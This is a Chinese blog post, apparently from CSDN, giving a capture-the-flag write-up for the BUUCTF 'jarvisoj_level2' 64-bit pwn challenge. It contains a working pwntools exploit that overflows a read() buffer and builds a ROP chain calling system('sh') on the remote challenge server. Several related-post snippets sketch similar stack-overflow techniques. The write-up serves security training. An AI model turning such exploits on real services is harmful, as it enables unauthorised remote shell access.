buuctf jarvisoj_level2 wp(python3)

最新推荐文章于 2024-11-06 12:32:13 发布
最新推荐文章于 2024-11-06 12:32:13 发布
阅读量89 收藏
点赞数
文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kata_Jhin/article/details/129408561
版权
文章讲述了如何利用64位系统read函数的溢出漏洞,结合已有的system和sh地址,通过ROPgadget找到设置rdi寄存器的gadget,构造payload实现远程连接到服务器并获取shell的过程。
摘要由CSDN通过智能技术生成

事前准备

64b小端序,除了不能shellcode还挺开放的

看看ida:

symtem sh都在

主函数没东西:

调用的函数很明显

漏洞及其利用思路

read函数的溢出很明显,sytem和sh都是现成的,只需要ROPgadget找一下rdi的调用就行(64传参的第一个寄存器)

exp:

from pwn import*

elf=ELF('./level2_x64')
#p=process('./level2_x64')
p=remote('node4.buuoj.cn',26523)
symadd=0x4004c0
shadd=0x600a90
mainadd=0x400620
rdiadd=0x4006b3

payload=b'a'*(128+8)+p64(rdiadd)+p64(shadd)+p64(symadd)
#之所以rdi和sym间不插入retadd是因为那段gadget自带有ret
p.sendlineafter(b"Input:",payload)

p.interactive()

getshell:

Kata_Jhin
关注
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 387
Buu CTF PWN题jarvisoj_level0的WriteUp
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 404
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BUUCTF jarvisoj_level0
WangLal的博客
09-06 164
因为这是新版checkssec,所以命令有所不同不过可以从图片中看出除了NX以外其他防护都没开。用file命令查看架构信息,为64位。
BUUCTF(1~10题wp
weixin_59531848的博客
05-31 409
通过漏洞泄露puts函数的真实地址,并计算出libc基址。然后,构造合适的ROP链来调用system函数,并传递"/bin/sh"字符串作为参数,从而获取shell权限。找到函数地址:首先,使用ELF模块获取目标二进制文件中函数的地址。在脚本中,通过elf.plt和elf.got来获取puts函数的plt和got表项的地址,以及encrypt和main函数的地址。构造漏洞触发payload:在脚本中,通过构造一系列的字节串来构造payload。首先,用填充到缓冲区,然后利用和puts_got地址,以及。
buuctf习题pwn(2~10)
yw__y的博客
03-30 1206
buuctf pwn入门1
weixin_63231007的博客
07-07 1465
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF(PWN)
fanshaoze的博客
09-27 645
看到19行,我们知道要输入一个63十进制转换41十六进制的字符长度,然后我们看到atoi知道这里是一个偏移量,804c044开头,我们知道要输入名字的数和密码数一致才能获得flag,这里我们用到了随机生成数。因为前面我们得到了他要输入的偏移量的16进制是41,所以我用AAAA %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x %8x。我们看了main知道了这里存在格式化字符串漏洞,我们只要将判断atoi改成system,手动输入/bin/sh字符串。
BUUCTF pwn wp 6 - 10
fa1c4的blog
05-15 342
jarvisoj_level0 栈溢出, 且到RBP的偏移为0x80, 查找字符串发现有"/bin/sh" 索引到引用的函数, 查看地址是 直接ret2text, 劫持执行流到后门函数即可, 因为是64系统, 所以需要平衡栈, 劫持到后门函数的第二条指令(跳过push RBP), 或者在EBP覆盖retn指令地址, 弹出一个字长内容. from pwn import * URL = "node3.buuoj.cn" PORT = 26152 sel = 1 io = process('./le
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 552
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
BUUCTF Pwn jarvisoj_level21解题步骤
2301_81505831的博客
02-04 266
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
BUUCTF_jarvisoj_level1
qq_39869547的博客
02-06 1012
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...
BUUCTFjarvisoj_level4(write up)
qq_44768749的博客
08-24 996
这里写目录标题0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、部分RELRO保护 0x02 运行 简单的输入一个字符串 0x03 IDA 漏洞点在vulnerable_function输入长度可以造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 第二次栈溢出跳转执行system("/bin/
BUUCTFjarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 967
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
PHP常用的安全函数作用
最新发布
sheji888的专栏
11-06 327
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
挂钩图像分割安全状态与危险状态识别系统:更新创新流程
lzmlzm89的博客
11-02 989
数据集信息展示在本研究中,我们使用了名为“test1”的数据集,以支持改进YOLOv8-seg的挂钩图像分割安全状态与危险状态识别系统的训练与验证。该数据集专门设计用于处理与安全相关的图像分类任务,旨在提高系统对不同安全状态的识别能力,从而为实际应用提供更为精准的安全监测解决方案。“test1”数据集包含三种主要类别,分别为“安全状态”、“危险状态_1”和“危险状态_2”。这些类别的选择反映了在实际应用中可能遇到的多样化安全场景,能够有效地模拟和识别不同的安全与危险状态。
【鉴权】OAuth 2.0: 高度灵活与安全的身份认证框架
人生苦短,睡觉要紧,睡醒再说
11-05 358
OAuth 2.0不仅允许第三方应用在不访问用户密码的前提下安全地访问用户在其他平台上的资源(如社交媒体账户或云存储),还通过灵活的授权模式满足了不同应用场景的需求。无论是Web应用、移动端应用还是桌面客户端,OAuth 2.0都为开发者提供了一个高效、可靠的解决方案。在本篇文章中,我们将深入分析OAuth 2.0的核心概念、授权流程、常见授权模式以及其在实际开发中的应用,帮助开发者全面理解这一授权机制的优势与实现方法。
网络安全渗透实际案例
专研计算机网络,数据通信,网络安全,系统集成
11-02 1332
该案例演示了如何通过信息收集、漏洞扫描、漏洞利用和后渗透测试等步骤,对目标系统进行完整的渗透测试。通过详细的操作步骤和修复建议,可以帮助安全人员更好地防御类似攻击。注意:渗透测试应仅限于合法授权的网络或系统。未经授权的渗透测试属于非法行为。步骤编号步骤名称操作说明代码示例1环境准备确保Kali Linux及相关工具已安装,如NmapMetasploitNetcat等。无2信息收集使用Nmap扫描目标系统,识别开放端口和服务版本。3确定服务漏洞。
RSA算法:数字安全的基石
zhaoshanshan168的博客
11-03 537
**选择公钥指数**:选择e,满足1 < e < φ(n)且gcd(e, φ(n)) = 1。- **计算私钥**:计算d,使得d * e ≡ 1 (mod φ(n))。- **大数分解**:RSA的安全性基于将模数n分解为其质因数p和q的困难性。- **计算欧拉函数**:φ(n) = (p - 1)(q - 1)。- **算法优化**:使用快速幂算法进行加密和解密,提升效率。- **数字证书**:用于身份验证,确保网站的真实性。- **计算模数**:n = p * q。
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值